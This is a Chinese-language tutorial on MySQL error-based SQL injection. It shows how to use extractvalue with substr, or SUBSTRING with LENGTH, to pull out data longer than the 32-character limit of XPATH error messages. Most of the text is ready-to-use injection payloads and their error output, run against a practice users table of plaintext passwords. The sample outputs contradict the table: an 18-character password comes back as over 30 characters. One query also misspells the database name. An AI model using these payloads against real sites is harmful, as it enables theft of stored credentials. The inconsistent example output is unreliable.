0x00 概要

在使用 extractvalue或是updatexml报错注入 方法时可能会出现一种情况要获取的数据大于了 32 位导致显示不完整。

这里展示两种常用突破方法

0x01 substr函数

方法1-sql: select * from users where id=1 and extractvalue(1, concat(0x7e,(SELECT distinct concat(0x7e,substr(password,1,10),0x7e) FROM security.users limit 0,1)));

方法1-sql讲解: select * from test where id=1 and extractvalue(1, concat(0x7e,(SELECT distinct concat(0x7e,substr(字段名称,开始读取的位置,指定显示的长度),0x7e) FROM 库名.表名 limit 0,1)))

  1. mysql> select * from test where id=1 and extractvalue(1, concat(0x7e,(SELECT distinct concat(0x7e,substr(password,1,10),0x7e) FROM test.tdb_admin limit 0,1)));
  2. ERROR 1105 (HY000): XPATH syntax error: '~~7fef617146~'

0x02 SUBSTRING 函数+LENGTH 函数

用法:
substring(str, pos),即: substring(被截取字符串, 从第几位开始截取)
substring(str, pos, length)
即: substring(被截取字符串,从第几位开始截取,截取长度)

使用这个函数的时候最好是搭配 length 函数一起使用,先获取数据长度,然后在通过偏移获取数据

  1. # 测试表数据:
  2. mysql> select * from users;
  3. +----+----------+--------------------+
  4. | id | username | password |
  5. +----+----------+--------------------+
  6. | 1 | Dumb | 123456789123456789 |
  7. | 2 | Angelina | I-kill-you |
  8. | 4 | secure | crappy |
  9. | 5 | stupid | stupidity |
  10. | 7 | batman | mob!le |
  11. | 8 | admin | admin |
  12. +----+----------+--------------------+
  13. 6 rows in set (0.00 sec)

先获取某字段的数据长度: select * from users where id=1 and extractvalue(1, concat(0x7e,(SELECT distinct concat(0x7e,length(password),0x7e) FROM security.users limit 0,1)))

  1. mysql> select * from users where id=1 and extractvalue(1, concat(0x7e,(SELECT distinct concat(0x7e,length(password),0x7e) FROM security.users limit 0,1)));
  2. ERROR 1105 (HY000): XPATH syntax error: '~~18~'

获取前30位的数据: select * from users where id=1 and extractvalue(1, concat(0x7e,(SELECT distinct concat(0x7e,SUBSTRING(password,1),0x7e) FROM security.users limit 0,1)))

  1. mysql> select * from users where id=1 and extractvalue(1, concat(0x7e,(SELECT distinct concat(0x7e,SUBSTRING(password,1),0x7e) FROM security.users limit 0,1)));
  2. ERROR 1105 (HY000): XPATH syntax error: '~~123456789123456789123456789123'

select * from users where id=1 and extractvalue(1, concat(0x7e,(SELECT distinct concat(0x7e,SUBSTRING(password,31),0x7e) FROM tsecurity.users limit 0,1)))

sql讲解: select * from test where id=1 and extractvalue(1, concat(0x7e,(SELECT distinct concat(0x7e,SUBSTRING(字段名,要开始读取的位置),0x7e) FROM 库名.表名 limit 0,1)))

  1. mysql> select * from users where id=1 and extractvalue(1, concat(0x7e,(SELECT distinct concat(0x7e,SUBSTRING(password,31),0x7e) FROM security.users limit 0,1)));
  2. ERROR 1105 (HY000): XPATH syntax error: '~~456789~'